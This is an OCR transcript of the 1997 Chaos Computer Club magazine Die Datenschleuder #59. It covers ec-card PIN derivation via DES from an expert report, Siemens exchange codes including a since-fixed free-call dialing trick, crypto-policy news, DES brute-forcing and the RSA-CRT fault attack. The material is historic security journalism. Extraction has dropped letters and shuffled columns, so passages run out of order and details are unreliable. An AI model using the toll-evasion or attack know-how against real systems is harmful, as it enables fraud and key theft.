u.a. als einer der Drahtzieher der Telekom-Affre um

berhhte Telefonrechnungen unschuldiger Kunden

der Redaktion bekannt, verursacht durch

Manipulationen (Dialer etc.) an Telekomleitungen zum

Zwecke des Supporting von Auslands (Sex) und

0190-Nummern. Insofern sind seine Aussagen als

Hacker unglaubwrdig, seine kriminellen

Intentionen und Kontakte jedoch als glaubwrdig ein-

zustufen.

b) Ist es dabei denkbar, da ein Tter diese

innerhalb von 30 Minuten herausndet, gege-benenfalls mit Hilfe von Erkenntnissen auseinschlgigen Vortaten, um welcheVorkenntnisse mte es sich dabei handeln?

Antwort:

Zum Zeitbedarf wurde bereits die Antwortgegeben: Es ist denkbar, da ein Tter diePIN einer gestohlenen ec-Karte innerhalb von30 Minuten herausndet.

Wenn man Vorkenntnisse aus einschlgigenVortaten unterstellt, so mten diese nach

Lage der Tatumstnde mittelsSystemkomponenten durchgefhrt wordensein, wenn nicht ein dem Sachverstndigenderzeit unbekanntes Berechnungsverfahrenzur PIN-Ermittlung eingesetzt worden ist.

Mit geringerer Wahrscheinlichkeit istanzunehmen, da der Tter lediglich mittieferem Wissen um die Ablufe imZahlungsverkehr zum Erfolg gekommen ist.Allerdings deutet der Umstand der dreistenBarabhebungen auf fundiertes (Insider)Wissen im automatisierten Zahlungsverkehr

hin. (1) Markus Kuhn: PIN auf EC-Karten knacken? /06.08.1996 (2) Ulf Moeller: Sicherheit von ec-Karten / 28.06.1996http://www.c2.net/~um/faq/pin.html(3) Die Datenschleuder - Das wissenschaftlicheFachblatt fr kreative Techniknutzung. Ein Organ desChaos Computer Club, Nr. 53 von Dezember 1995,ISSN 0939-1045(16) DIN/ISO 4909 und Regelwerk des ZentralenKreditausschusses

(19) AG Kln 116 Js 599/89(21) Zentraler Kreditausschu: Anhang 3 zu denRichtlinien fr das deutsche ec-Geldautomatensystemi.d. F.v. 01.01.1995, S. 28

(22) Siegfried Herda: Gutachten zur Sicherheit von ec-Karten mit Magnetstreifenfr LG Kln Az.: 1 1 S 338/92, Februar 1994(23) Michael J. Wiener: Efcient DES Key Search, Bell-Northern Research Ottawa 20. August 1993(24) Balze, Dife, Rivest, Schneider, Shimomura,Thompson, Wiener: Minimal Key Lengths forSymmetric Ciphers to provide Adequate

Die Datenschleuder


Gutachten 9422/ 03


22/32

Ermittlung der PIN

Die Datenschleuder



Bankleitzahl

12345678

Konto-Nummer

1234567890

Kartenfolgenummer

1

4567812345678901 zu verschlsselnde Dezimalzahl

Wandlung in Binrzahl

DES 56 Bit geheimer Schlssel

Ergebnis des DES-Verfahrens:

Inst.-Schl. 1D375AF548B34C48

Pool-Schl. 2FD5B2FF3A4827FF

Vom Ergebnis werden 3.-6.

Stelle fr PIN ausgewhlt.

Instituts-

karte?

ja

375A

nein

D5B2Ergebnis mit

Institutsschlssel

Ergebnis mitPoolschlssel

0248Offset wird bei

Poolschl. addiert

PIN 3750

Wandlung von Hex zu Dezimal nach Modulo 10


23/32

Neue EWSD-Features

Auch die Siemens-Vermittlungsstellen(EWSD) erhielten krzlich neue Software.Unter anderem wurde eine Art Anti-Scan-Verhalten in Bezug auf */#/A/B/C/D-Kombinationen eingebaut. So reagiert die Vst

jetzt wesentlich toleranter auf versehentlicheFalscheingaben bei Steuersequenzen (*xxx,#xxx, *#xxx). Neu hinzugekommengegenber dem vorigen Release sind *34#und *35# (bzw. #34#/*#34#/#35#/*#35#),die wahrscheinlich eine Auswahl der Art derAnrufsperre durch den Teilnehmerermglichen sollen. Bisher konnte man mit*33# nur einen vorher festgelegten Typ (z.B.Auslands- oder Vollsperre) aktivieren. Schonseit der letzen Version gibt es *37# (Rckruf

bei besetzt auch fr analoge Anschlsse) und*31# und *22# (Funktion unbekannt, wei

jemand genaueres?).

Ein eher nervendes Feature wurde mitdiesem Update der Anrufweiterleitung zuteil:Der Anrufer hrt, wenn er einen Anschluanruft, der umgeleitet wird, die Ansage Wirverbinden weiter. Somit entfllt dieMglichkeit, Anrufe diskret umzuleiten.

Bugs

Mit der neuen EWSD-Software verschwandauch ein sehr beliebter ISDN-Bug: Fr alleAnschlsse an Siemens-Vsts gibt es eineNummer, mit der man begrenztLeitungsqualitt und Funktion desAnschlusses prfen kann (z.B. Berlin:01177555+). Wenn man

jedoch 01177555+ whlte,und zwar so, da ein Teil dieser Nummer inBlockwahl (mehrere Ziffern werden gleichzei-tig zur Vst geschickt, z.B. durch Wahl bevorman den Hrer abnimmt) und der andere Teileinzeln bermittelt wurde, hatte man eineVerbindung zu diesem Anschlu -gebhrenfrei (wie grundstzlich alleVerbindungen zu Nummern, die mit 0117

beginnen)[email protected]

Pannen bei Software-Updates

Bei der Einspielung der neuenVermittlungsstellen-Software Anfang Aprilstrzten die SEL-Ortsvermittlungsstellen am8.4.97 in Nrnberg und Mnchen erstmalganz ab. In anderen Ortsnetzen wurdenNetzansagen (z.B. Kein Anschlu unterdieser Nummer) nicht mehr korrekt wieder-gegeben, Makeln funktionierte nicht mehrund einigen Teilnehmern wurde eine nichtabschaltbare Umleitung auf die T-Net-Boxaktiviert.

T-Net-Box

Die T-Net-Box ist der Anrufbeantworter imNetz der Telekom. Von den meistenAnschlssen an digitalen Vermittlungsstellen(S12/EWSD) kann dieser inzwischen ber die0130/144770 eingerichtet werden. Allerdingssollte man vorher sicherstellen, da man - imFalle eines ISDN-Anschlusses - ber

Anrufweiterschaltung verfgt, bzw. bei nicht-ISDN die zugehrigen Steuersequenzenfreigeschaltet sind (*xxx#: Umleitung auf T-Net-Box aktivieren, wobei fr xxx gilt: 000 -alle Anrufe auf den Anrufbeantworterumleiten, 555 - bei besetzt, 888 - nach 15Sekunden klingeln. Mit #xxx# wird die jewei-lige Umleitung deaktiviert). brigens ist dasT-Net-Box-System noch mindestens bis zum31.7. im Test-Betrieb. Dieser sollte zwar zum1.6. beendet sein, mute jedoch wegenSoftware-Problemen verlngert werden.Bevor man diesen Netz-AB einemherkmmlichen vorzieht, sollte man jedoch

beachten, da die *T*** damit theoretischZugriff auf alle eingegangenen Nachrichtenhat.

Weitere Informationen zur T-Net-Box gibt esals Faxabruf-Dokument unter 0228/1819657oder bei den freundlichen HotlineMitarbeitern unter 0130/141414.

Die Datenschleuder


OVst-Watch


24/32

mglichst noch vor der Sommerpause eine

Direktive an die Mitgliedslnder zurEindmmung illegalerEntschlsselungstechnik auszugeben.

Darber hinaus sollen sich auchPrivatpersonen strafbar machen, die illegaleEntschlsselungstechnik benutzen oder besit-zen. Durch ein derartiges Gesetz entstndeeine gefhrliche technische Grauzone in derStrafbarkeit, weil damit letztlich alleleistungsfhigen frei programmierbarenComputer illegal werden.

Der Kosten/Nutzen-Aufwand zum Knackenvon Eurocrypt betraegt fr einen Geheim-dienst mit Budget 300 Millionen US-Dollar ca.zwlf Sekunden, bei einemGrossunternehmen mit 10 Mio$ Budget etwasechs Minuten (es heisst, der BND habe zweisolcher Maschinen) und bei einer Investitionvon nur 400 Dollar 38 Jahre.

Wau Holland fuer eMailPress, die agentur gegenden [email protected]

Deutscher BundestagDrucksache 13 / 775313. Wahlperiode 22.05.97

Antwort der Bundesregierung auf die KleineAnfrage des Abgeordneten Dr. ManuelKiper und der Fraktion BNDNIS 90/DIEGRNEN - Drs. 13/ 7594

Lage der IT-Sicherheit in Deutschland

47.Welcher Aufwand ist nach Kenntnis derBundesregierung ntig, um mit asymmetrischenVerfahren verschlsselte Daten mitSchlssellngen von 40, 56 und 128 Bit zuentschlsseln und wie gross ist nachAuffassung der Bundesregierung die fr eineVerschlsselung sensitiver Daten hinreichendeSchlssellnge fr eine - auch ber die nchsten

fnf Jahre - sichere bermittlung?

Unter der Voraussetzung, dass fr einsymmetrisches Verfahren keine andereAnalysemethode bekannt ist als dievollstndige Absuche des Schlsselraumes,lassen sich die nachstehenden Aussagentreffen:

Die Datenschleuder


Krypto-New s

Alte Welt bangt und zappelt

Gesetze gegen Codeknacker geplant(emp) 06.06.97 - Eine europaweiteGesetzgebung gegen sogenannteFernsehpiraterie rckt nher. Weil nichtzuletzt durch den Einuss der kryptofeind-lichen Franzosen bei der Eurocrypt-Norm einschwaches Verschlsselungsverfahren (DESmit nur 56 Bit) gewhlt wurde, sindCodeknacker bei der Entschlsselung vonPay-TV-Fernsehprogrammen oft erfolgreich.

Statt starke Verschlsselungsverfahrenzuzulassen, soll jetzt sogar der Besitz vonComputern kriminalisiert werden, wenn siegeeignet zum Codeknacken sind. Der Berichtfordert Strafgesetze gegen Personen undUnternehmen, die ohne Autorisierung Gerteund Entschlsselungssoftware herstellen, ver-

breiten oder verkaufen. 422 Abgeordnete desEuropaparlamentes stimmten am 13. Mai1997 in Strassburg dem Anastassopoulos-Bericht zu, bei sechs Gegenstimmen undsechs Enthaltungen. Das Parlament

beauftragte die Europische Kommission,


25/32

USA-Regulierungen

Kontrolleinschrnkungssimulation

The US government will announce latertoday that will soon lift controls ontechnology crucial to doing business over theInternet, White House advisor Ira Magazinersaid yesterday evening.

Under plans expected to be outlined at anoontime press brieng today, the federalgovernment will require that producers of

specialized, narrowly focused datascrambling products submit only to one-timegovernment approval before they sellpowerful encryption products abroad.Current policy requires case-by-case approvalin most instances.

Basically it will say that for basic nancialand electronic applications there will be noexport restrictions and no requirement forkey recovery, Magaziner said.

US Undersecretary of Commerce WilliamReinsch is expected to give details of the plan.

Reinsch could not be reached for comment.Computer industry executives and publicinterest groups said the new arrangement,though far short of deregulating allencryption, was a step in the right direction.

This is evidence that the administration ack-nowledges that manufacturers of foreign

* 40-Bit-Verfahren knnen - allerdings mit

hohem zeitlichen und apparativen Aufwandmittels Hochleistungsrechnern oder auf demWege des verteilten Rechnens entziffertwerden. Die genaue Hhe des Aufwandes istverfahrensabhngig.

* 56-Bit-Verfahren erfordern zu ihrerEntzifferung den Einsatz vonSpezialrechnern,die eigens zu diesem Zweck konstruiertwerden mssen. Bei deren entsprechenderDimensionierung lsst sich der zeitlicheAufwand auf die Groessenordnung vonStunden begrenzen.

* Die vollstndige Absuche eines 128-Bit-Schlsselraums entzieht sich jeder heute undin absehbarer Zeit verfgbarenRechentechnik.

Ab einer Schlssellnge von etwa 80 Bit kann- bei ansonsten entzifferungsresistentemDesign - die Mglichkeit einer Analysedurch Absuche des Schlsselraums frdie berschaubare Zukunft, insbesondere dernchsten fnf Jahre, ausgeschlossen werden.

Verteilte brute force attacke auf DES

DES noch nicht tot, stinkt aber schon

Am 19. 6.1997 war es soweit: erstmals in derGeschichte hat eine nicht-geheimeOrganisation einen DES-Schlssel durch

brute force geknackt. Von der Firma RSAwurden $10.000 Preisgeld und einPlaintext/Ciphertext-Paar bereitgestellt,insgesamt wurden von mehreren tausendTeilnehmern in zwei ueber das Internetkoordinierten Gruppen (eine fuer die USA,eine fuer den Rest) ungefaehr 50% desSchluesselraums durchsucht, und es wurdennach vorsichtigen Schaetzungen 447.000MIPS-Jahre verbraten. Damit geht dieserHack als groesste verteile Berechung in dieGeschichte [email protected]

Die Datenschleuder



26/32

render it all but useless for general use. Visa,

MasterCard and American Express developedthe standard. Id expect programs writtenthe SET to get very rapid approval - withinweeks, Daguio said.

In addition, US companies will have leewayto export any kind of encryption to any bankas long as that encryption is used only forlegitimate, internal bank functions. Productsdesigned for merchant-to-merchanttransactions without a bank in betweenwould still be subject to stricter controls,including use of weak software routines that

make decoding by law enforcement easy, ordeposit of decoding keys with lawenforcement bodies prior to export.Commerce Department regulations will spellout details this month or next, Daguio said.

Though more sweeping in nature than pastgovernment regulations, the US bankingindustry has long enjoyed more freedom touse powerful encryption technologies abroadthan other industries. Successiveadministrations have granted banks thatleeway since by denition they must have

greater safeguards over employee behaviorthan all but a handful of industries. In additi-on, nancial applications have long beeneasier to design for export since they typicallyrequire encryption of only a few standarddata elds. If sufciently limited in design,the reasoning goes, they pose no threat to lawenforcement concerned about smugglers orterrorists who may want to evade detection

by law enforcement. The government and thecomputer industry have for years been lockedin disputes over the relative importance of

encryption technologies and their potentialfor misuse. [...]Absent US encryption exports, they claim,American companies will soon lose theirleadership role in a technology crucial to thecountrys competitiveness.

Federal ofcials, on the other hand, have saidexport of the technology threatens globalsecurity, since terrorists and criminals inoutlaw states like Libya and North Koreacould easily use the technology to defeatwiretaps and data searches increasingly

prized by law enforcement and national secu-

Die Datenschleuder


Krypto-New s

encryption products do exist, said PeterHarter, public policy counsel at NetscapeCommunications Corp. Their policy has putAmerican industry in the back seat and nowwere trying to catch up. David Banisar,policy analyst at the Washington-basedElectronic Privacy Information Center, calledthe move a small step forward.Nonetheless, it still doesnt reach the needsfor secure e-mail or other purposes, he said.

Computer software and hardware eligible fordecontrol under the proposed regulationsmust t several criteria, said Kawika Daguio,a public affairs specialist with the AmericanBankers Association who helped hammer outan agreement for the new regulations.

.Though products designed for use by thegeneral public may be unlimited in thestrength of the encryption techniques they

employ, they must also be strictly limited inuse, he said. Software written for homebanking, for instance, must be usable only forbank transactions and not easily modied forgeneral use. Most programs handed out by

banks for PC banking at home t that criteria,he said.

Programs that use the industry SET standardfor credit card purchases over the Internetshould easily meet Commerce Departmentcriteria, too, since the SET standard encryptsonly those data essential to making online

purchases; the limited uses of the standard


27/32

In letzter Minute: Amis drehen doch noch durch

ALERT: Senate to vote on mandatorykey escrow as early as Thu June 19!

On Tuesday June 17, Senators John McCain (R-AZ) andBob Kerrey (D-NE) introduced legislation which wouldall but mandate that Americans provide guaranteedgovernment access to their private onlinecommunications and stored les. The bill, known asThe Secure Public Networks Act of 1997 (S.909)represents a full scale assault on your right to protectthe privacy and condentiality of your online commu-

nications. Though offered on Capitol Hill as a compro-mise, the McCain-Kerrey bill is virtually identical todraft legislation proposed earlier this year by theClinton Administration while doing nothing to protectthe privacy and security of Internet users. The billclosely mirrors draft legislation proposed by theClinton Administration earlier this Spring. Specically,the bill would:* Compel Americans to Use Government-ApprovedKey Recovery Systems * Make Key Recovery aCondition Of Participation in E-Commerce * AllowGovernment Carte Blanche Access to SensitiveEncryption Keys Without a Court Order * Create NewOpportunities for Cybercrimes * Codify a low 56-bitKey Length Limit on Encryption Exports * CreateBroad New Criminal Penalties for the Use ofEncryption. The full text of the bill, along with a detai-led analysis, is available online athttp://www.cdt.org/crypto/

rity agencies. In response, they demand that

exports of powerful encryption include so-called key recovery - a method by which lawenforcement can gain access to the encryptionkeys used to encode messages. Many publicinterest groups have condemned the plans,however, saying such a transfer of power tolaw enforcement threatens to usher in an eraof ubiquitous and illegal eavesdropping.Several bills pending in Congress would doaway with nearly all controls. Reinsch wasexpected to testify at congressional hearingson one of the bills this morning.

By Will Rodger /Washington Bureau CheifInter@ctive Week

These new regulations to be issued arescrambling to catch up with previous andcurrent practices...

It doesnt change things at all.When they issued the new export regulationsin January, the glaring hole was the absenceof an explicit exception for the nancial indu-stry. Under the customs that evolved aroundITAR, you could get an export license forstrong crypto as long as the overseascustomer was a nancial institution. Thisannouncement is simply a publicacknowledgment that the BXA will lookfavorably on export requests to banks andthat someday theyll try to draft specic regu-lations on the subject. Meanwhile you do it

by grinding through the bureacracy. Exportpermission for strong crypto that onlyencrypts nancial data is clearly a variant ofthis tradition. They already granted export

permission for one vendor of such a system,so Im not surprised theyre planning to makeup a regulation to cover it.Rick. [email protected]

PGP darf exportiert werdenPretty Good Privacy, hat vom US-Handels-ministerium die Erlaubnis bekommen, dadas Produkt nun auch mit der 128-Bit-Verschluesselungstechnologie ofziellexportiert werden darf.

30.05.97 Horizont Newsline

Die Datenschleuder



28/32

Nach dem Chinesischen-Restsatz (Chinese

Remainder Theorem) existieren nmlich zweieinfach und nur einmal im vorausbestimmbare Werte a und b mit

a = 1 MOD p, a = 0 MOD q bzw b = 0 MODp, b= 1 MOD q.

Mit diesen beiden Zahlen gilt

E=aE[p]+bE[q] MOD N.

Diese ist offensichtlich deutlich efzienter als-die direkte Potenzierung modulo N, da dieOperationen mit deutlich krzeren Zahlendurchgefhrt werden knnen. Bruce Schneierempehlt in seinem StandardwerkAngewandte Kryptographie (1996) diesesVorgehen und auch die RSAREF-Referenzim-plementierung von RSASDI und PGPverwenden das CRT. Sind p und q ungefhrgleich gro, halbiert sich ungefhr die Lngeder Zwischenergebnisse. Dies ist natrlichfr Chipkarten mit beschrnktemSpeicherplatz von ganz besonderem Vorteil.Die Signaturzeit wird nach Angaben derChipkartenhersteller mindestens halbiert.

FAMEX -Zahlen aus einem Philipsprospekt(Mai 1997)Schlssel-Bits, 512, 768, 1024, 2048Straightforward (ms), 140, 410, 805, 18200Chinese Remainder (ms), 56, 164, 322, 2156

Gehen wir nun davon aus, da entweder beider Berechnung von E[p] oder von E[q] einFehler auftritt. Diese Annahme ist, da dieseBerechnungen die zeitlich aufwendigstenAbschnitte des Algorithmus sind, sehrrealistisch. Nun ist mit hoherWahrscheinlichkeit N kein Teiler von (M-

Fê), wobei e der zur Verikation derSignatur bentigte ffentliche Exponent ist.Dann gilt aber

GGT(M-Fê,N)=q.

Somit kann man den RSA-Modul N(=pq) fak-torisieren und so einfach den geheimenSchlssel d berechnen. Kurz gesagt ist dasder kryptographische Super-GAU.

Witzig dabei ist, da der einfache Anwender,der zur Kontrolle der Signatur M=Eêausrechnen mu, direkt auf den Fehler hinge-

wiesen wird.

Die Datenschleuder


Abt. w undersame Dinge

Fehler & Folgen

RSA(CRT): One strike and youre out!Manchmal sind es die berhmtenRandbemerkungen, die kryptographischeErdbeben auslsen sollten. Speziell wenn die-se Randbemerkung zwei Tage nach einerwichtigen Verffentlichung von Arjen Lenstrakommt. Lenstra ist nicht nur einer derHackervter von digicrime, sondern auchpromovierter Mathematiker und einer derfhrenden Faktorisierungsforscher. Wenn dieWissenschaftler von Bellcore in ihrem

berhmten Artikel On the Importance ofChecking Cryptographic Protocols on Faultsalso eine Mail von Lenstra zitieren, istsicherlich Aufmerksamkeit angesagt.

Aber irgendwie scheint es mal wiederniemanden zu interessieren, was sichHacker/Mathematiker da berlegt haben.Dabei ist die Sache hchst brisant: EINEdurch Hardwarefehler unkorrekte RSA-Unterschrift fhrt mit fast 100%-igerSicherheit zur Aufdeckung des geheimenRSA-Schlssels. Der Angreifer bekommtdie Mglichkeit direkt angezeigt, und dieBerechnung ist trivial.

Um es wissenschaftlich exakt zu formulieren:Entsteht ein Fehler whrend des Signierens,tritt er mit hoher Wahrscheinlichkeit zum imFehlermodell angenommenen Zeitpunkt auf.Er kann als beliebiger Bitfehler angenommenund mit sehr hoher Wahrscheinlichkeit kanndas RSA-Modul N mit einem Aufwand voneiner Potenzierung mit dem ffentlichenExponenten, einer Addition und einer GGT-Blidung faktorisiert werden.

Aber der Reihe nach:

Durch einen altbekannten mathematischenTrick kann man die fr das RSA-Verfahrennotwendige, aufwendige Potenzierung stark

beschleunigen. Statt die RSA-Signatur

E=m^d MOD N

direkt modulo N zu berechnen, rechnet mandie beiden Werte

E[p] =m^d MOD p und E[q]=m^d MOD q,wobei p und q die beiden Primfaktoren vonN sind.


29/32


30/32

Internet jetzt mit FlirtmaschineThe Internet is transforming courtship, with aservice as sly as it is shy. Mixing digital-ageefciency with old-fashioned mystery, afreeweb site called Secret Admirer TheElectronic Cupid,http://www.SecretAdmirer.com, lets usersanonymously nd out if their romanticfeelings are mutual. When you receive aSecret Admirer e-mail it reads: This messagehas been sent by a secret admirer! Is thefeeling mutual? The only way to nd outwho may have sent you a message is to go to

the web site and send an anonymous SecretAdmirer

Datenschleuder #59

Documents

Transcript of Datenschleuder #59